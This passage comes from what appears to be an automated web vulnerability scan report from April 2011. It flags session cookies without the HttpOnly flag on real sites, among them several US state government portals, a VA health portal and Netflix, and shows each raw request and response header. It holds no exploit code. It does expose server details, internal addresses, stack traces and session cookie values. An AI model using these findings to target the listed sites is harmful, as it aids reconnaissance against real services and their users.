set-cookie:JSESSIONID=AAHZoUENylmma40Rij+x5A;Domain=www.mema.state.md.us;Path=/MEMA
connection:Close
content-type:text/html;charset=ISO-8859-1
content-length:25356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...

14.170. http://www.molottery.com/winningNumbers.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.molottery.com
Path:   /winningNumbers.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /winningNumbers.do HTTP/1.1
Host: www.molottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:37:25 GMT
Server: Apache/2.0
Set-Cookie: lottery-track=173.193.214.243.1304167045882473; path=/; expires=Sun, 29-Apr-12 12:37:25 GMT; domain=.molottery.com
Set-Cookie: JSESSIONID=B68A0D1FE6158E2B37564B1E5B08F479.tomcat2; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 10954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<html>
<head>
<link href="/c
...[SNIP]...

14.171. http://www.money-rates.com/news/10-best-states-for-making-a-living.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.money-rates.com
Path:   /news/10-best-states-for-making-a-living.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/10-best-states-for-making-a-living.htm HTTP/1.1
Host: www.money-rates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Cache-Control: public
Cache-Control: public
Content-Type: text/html; charset=UTF-8
Date: Sat, 30 Apr 2011 12:39:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=o84oc0t53fauuilmk9f0e2ouc2; path=/
Content-Length: 40372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta name="WT.qs_dlk" content="F
...[SNIP]...

14.172. http://www.ms.gov/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.ms.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 28952
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 01:32:51 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A4096B080A0C1A16441A441A36E4B4FD
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHcpmiCIVI/8d6Wm4cQjfJgvD3epoaX7BxO9cvwSlmEpUVHAyxBUQ3G3R7AF+nW9yT/P4tZ9y6GitT3kFynA0MJk=
Set-Cookie: JSESSIONID=0000L_YVcZIXP8tb45uoRDKgRGx:-1; Path=/


   <html>
<head>
   <title>The Official State Web Site of Mississippi</title>
   <link href="ms02.css" rel="stylesheet" type="text/css">
</head>


<!-- End Call -->

<body bgcolor="#fff
...[SNIP]...

14.173. http://www.ms.gov/how_do_i_answer_page.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /how_do_i_answer_page.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /how_do_i_answer_page.jsp HTTP/1.1
Host: www.ms.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.2.10.1304126862;

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-length: 15678
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:38:03 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A66A6E320A0C1A16441A441AED000D08
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHXS0LWb4JUmSQGBP39pv/5vh8OQcXHSfi2cvpEBHNBUkkBci4eOicVIdtZN3vU5HHpfhdYBbneUq02e4ERw2fvI8FfRB/AcNvzC+ww4I35NR
Set-Cookie: JSESSIONID=0000xJwrqjtLPslotER-tyMeOt-:-1; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html>
<head>
   <title>How Do I | The Official State Web Site of Mississippi</title>
   <link href="ms02.css" rel="styleshe
...[SNIP]...

14.174. http://www.ms.gov/how_do_i_fulllist.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /how_do_i_fulllist.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /how_do_i_fulllist.jsp HTTP/1.1
Host: www.ms.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.2.10.1304126862;

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-length: 2223
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:38:03 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A66A6D3A0A0C1A16441A441AE2822A11
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHXS0LWb4JUmSQGBP39pv/5tMnyoqXIiDEf1E3kxDkhBLcvsIFODLZmfTfryY8kNBd48FrzEoq7Tdc85xVpBd/JLWQAvQGWj0QwXCLOFPSxWu
Set-Cookie: JSESSIONID=0000Cg_PhPwo65Y5H8nQ6kbZOsH:-1; Path=/


<!--
Exception:
java.lang.NullPointerException
   at com.ibm._jsp._how_5F_do_5F_i_5F_fulllist._jspService(_how_5F_do_5F_i_5F_fulllist.java:344)
   at com.ibm.ws.jsp.runtime.HttpJspBase.service
...[SNIP]...

14.175. http://www.ms.gov/how_do_i_sub_answer_page.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /how_do_i_sub_answer_page.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /how_do_i_sub_answer_page.jsp HTTP/1.1
Host: www.ms.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.2.10.1304126862;

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-length: 2249
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:38:03 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A66A6F400A0C1A16441A441ADDE8D1CF
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHXS0LWb4JUmSQGBP39pv/5tpo7BNoXtBnh8auN/0QyeN2Vh8RdYKO8hyoVmp78QLir6R1YI/Ed62rgEvMEqkt4IwtqKjzb509iiKN2Fe+Xjcal09hXwPEI7Wrr5lXGwnDQ==
Set-Cookie: JSESSIONID=000032mh8mmm_F0tKy929UjXxyg:-1; Path=/


<!--
Exception:
java.lang.NullPointerException
   at com.ibm._jsp._how_5F_do_5F_i_5F_sub_5F_answer_5F_page._jspService(_how_5F_do_5F_i_5F_sub_5F_answer_5F_page.java:396)
   at com.ibm.ws.jsp.r
...[SNIP]...

14.176. http://www.ms.gov/ms_sub_sub_template.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /ms_sub_sub_template.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ms_sub_sub_template.jsp HTTP/1.1
Host: www.ms.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.2.10.1304126862;

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-length: 2175
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:38:04 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A66A70870A0C1A16441A441A7740D041
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHUG1V9zgQBAvmGanPPuAtYanTqd7tLguoSy1xO10uBKEhigTjyA+jTMjiOzXK3S8HFPBCbIHSyyFb+3RsTQakYONP5JWEpsdchIFlN7FRi4A
Set-Cookie: JSESSIONID=0000C0jbp_VXrzKWjMaZspUuOvL:-1; Path=/


<!--
Exception:
java.lang.NullPointerException
   at com.ibm._jsp._ms_5F_sub_5F_sub_5F_template._jspService(_ms_5F_sub_5F_sub_5F_template.java:491)
   at com.ibm.ws.jsp.runtime.HttpJspBase.ser
...[SNIP]...

14.177. http://www.ms.gov/ms_sub_template.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /ms_sub_template.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ms_sub_template.jsp HTTP/1.1
Host: www.ms.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.2.10.1304126862;

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:38:04 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A66A709B0A0C1A16441A441AC2951C36
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHUG1V9zgQBAvmGanPPuAtYZWQHtAYSklg01qYE0ZX2Lg7mlNPl70nzYjDbgcmgGlwN5cwgPMSSUR4pTaqrepuY13rHldvZD7gDNVAx04SG1D
Set-Cookie: JSESSIONID=0000iF6FaOD-2hq9LDM_o0eMPg2:-1; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html>
<head>
   <title> | The Official State Web Site of Mississippi</title>
   <link href="ms02.css" rel="stylesheet
...[SNIP]...

14.178. http://www.ms.gov/online_services_sub_sub_all.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /online_services_sub_sub_all.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online_services_sub_sub_all.jsp HTTP/1.1
Host: www.ms.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.2.10.1304126862;

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-length: 16664
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:38:05 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A66A74350A0C1A16441A441A0DB92B7F
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHc2Okr2BDiPBsEhV4AjWgb6vRsfBf0mbkKG6g1KSNZOjvLKGbPjpFa2ave335DJTB7VgPnn36vwT6Fi1jKkBol5VpSKv+baHoYrAZbg9lKDrrE6Mpe1VQ6s/P/AON8pi4w==
Set-Cookie: JSESSIONID=0000eUdB03UXoM-wUT5sgYKaMCv:-1; Path=/


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Online Services - All Services | The Official State Web Site of Mississippi</title>
   <link href=
...[SNIP]...

14.179. http://www.ms.gov/state_agencies_alpha.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ms.gov
Path:   /state_agencies_alpha.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /state_agencies_alpha.jsp HTTP/1.1
Host: www.ms.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000M7YxLq1MT9EUpfIPLeRX9E-:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.2.10.1304126862;

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:38:06 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A66A7A580A0C1A16441A441AB55F52C5
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHWRy13HJsdCJb/qWVM70qCeZBvHSikvX4+Pkrx3EtxxZm29aduVzGUaZ14BHjWJhagxNv7QzsjBjn/2Wl089a1a1NsuMLJnc7HSsJbXx5O7z
Set-Cookie: JSESSIONID=0000IM3Mfp6PLai8OlKHCdvN-ne:-1; Path=/


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>State Agencies | The Official State Web Site of Mississippi</title>
   <link href="ms02.css" rel="
...[SNIP]...

14.180. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.myhealth.va.gov
Path:   /mhv-portal-web/anonymous.portal

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mhv-portal-web/anonymous.portal HTTP/1.1
Host: www.myhealth.va.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:37 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Pragma: No-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-wily-servlet: Clear appServerIp=10.224.43.30&agentName=mhvma_ms10b&servletName=PortalServlet&agentHost=vamhvapp16&agentProcess=WebLogic
Set-Cookie: JSESSIONID=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
X-wily-info: Clear guid=A66BDECC0AE02B1E0053836AAA14FF5A
Connection: close
Set-Cookie: TSd0b0d9=f8f48700ac5e28f4a998bfb011b276dc9b3028ce4c2a4a934dbc0308; Path=/
Content-Length: 22826


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title>My HealtheVet </title><meta name="bea-portal-me
...[SNIP]...

14.181. http://www.nccourts.org/Citizens/GoToCourt/Default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nccourts.org
Path:   /Citizens/GoToCourt/Default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Citizens/GoToCourt/Default.asp?topic=1 HTTP/1.1
Host: www.nccourts.org
Proxy-Connection: keep-alive
Referer: http://nc.gov/1222,1222,Online_Services,Online_Services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 30 Apr 2011 00:49:01 GMT
X-Powered-By: ASP.NET
Content-Length: 16514
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASDQTAAR=ADICHPIBABAGCDEJAHFKEIPM; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/transitional.dtd">
<html>
   <head>
       <meta name="GENERATOR" content="Microsoft Visual Studio 6.0" /
...[SNIP]...

14.182. http://www.nccrimecontrol.org/Index2.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nccrimecontrol.org
Path:   /Index2.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Index2.cfm HTTP/1.1
Host: www.nccrimecontrol.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 30 Apr 2011 12:39:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=703335;expires=Mon, 22-Apr-2041 12:32:41 GMT;path=/
Set-Cookie: CFTOKEN=59243085;expires=Mon, 22-Apr-2041 12:32:41 GMT;path=/
location: .?CFID=703335&CFTOKEN=59243085
Content-Type: text/html; charset=UTF-8


14.183. http://www.nd.gov/content.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nd.gov
Path:   /content.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content.htm HTTP/1.1
Host: www.nd.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:37 GMT
Server: IBM_HTTP_Server
Expires: Sat, 25 Dec 1993 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Length: 0
Content-Type: text/html
Content-Language: en-US
Set-Cookie: JSESSIONID=00002kKi3fc6IUTYyMrzZyiM__8:13c99i0mh; Path=/
Connection: close


14.184. http://www.netflix.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netflix.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.netflix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 12:39:39 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA"
Location: http://www.netflix.com/Default?tcw=1&cqs=
Content-Length: 0
Set-Cookie: VisitorId=002~7eabf80e-bdf8-4546-9025-bba2b0852eb1~1304167179465~true~1304167179465~; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Set-Cookie: nflxsid=217.1304167179465; Domain=.netflix.com; Path=/
Set-Cookie: NetflixSession=217.39c40b20-ccdd-4c3e-8df4-c0e52d7a1451; Domain=.netflix.com; Path=/
Set-Cookie: NetflixCookies=try_persistent; Domain=.netflix.com; Expires=Mon, 30-May-2011 12:39:39 GMT; Path=/
Set-Cookie: asearch=130416717946615217; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Vary: Accept-Encoding
Cache-Control: private
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e6445525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly


14.185. http://www.netflix.com/NRD/PS3  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netflix.com
Path:   /NRD/PS3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NRD/PS3 HTTP/1.1
Host: www.netflix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 12:39:39 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA"
Location: http://www.netflix.com/NRD/PS3?tcw=1&cqs=
Content-Length: 0
Set-Cookie: VisitorId=002~c4c3625f-42a6-4f4d-9806-fa85844e7c50~1304167179465~true~1304167179465~; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Set-Cookie: nflxsid=218.1304167179465; Domain=.netflix.com; Path=/
Set-Cookie: NetflixSession=218.211d7ea3-02f5-4a1c-8153-e9424b65d4b7; Domain=.netflix.com; Path=/
Set-Cookie: NetflixCookies=try_persistent; Domain=.netflix.com; Expires=Mon, 30-May-2011 12:39:39 GMT; Path=/
Set-Cookie: asearch=130416717946644218; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Vary: Accept-Encoding
Cache-Control: private
Keep-Alive: timeout=15, max=47
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e6745525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly


14.186. http://www.netflix.com/NRD/Wii  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netflix.com
Path:   /NRD/Wii

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NRD/Wii HTTP/1.1
Host: www.netflix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 12:39:39 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA"
Location: http://www.netflix.com/NRD/Wii?tcw=1&cqs=
Content-Length: 0
Set-Cookie: VisitorId=002~f6aea8d5-7e11-4396-87aa-3a3bf97b1bad~1304167179725~true~1304167179725~; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Set-Cookie: nflxsid=204.1304167179725; Domain=.netflix.com; Path=/
Set-Cookie: NetflixSession=204.60b0c1a1-de44-4927-8f24-ae2eaddcb8ed; Domain=.netflix.com; Path=/
Set-Cookie: NetflixCookies=try_persistent; Domain=.netflix.com; Expires=Mon, 30-May-2011 12:39:39 GMT; Path=/
Set-Cookie: asearch=130416717972639204; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
Vary: Accept-Encoding
Cache-Control: private
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e7945525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly


14.187. http://www.netflix.com/NRD/Xbox  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netflix.com
Path:   /NRD/Xbox

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NRD/Xbox HTTP/1.1
Host: www.netflix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 12:39:39 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA"
Location: http://www.netflix.com/NRD/Xbox?tcw=1&cqs=
Content-Length: 0
Set-Cookie: VisitorId=002~5ce7ec58-66b2-4e6c-92fe-dd1ff9a55459~1304167179999~true~1304167179999~; Domain=.netflix.com; Expires=Sun, 29-Apr-2012 12:39:39 GMT; Path=/
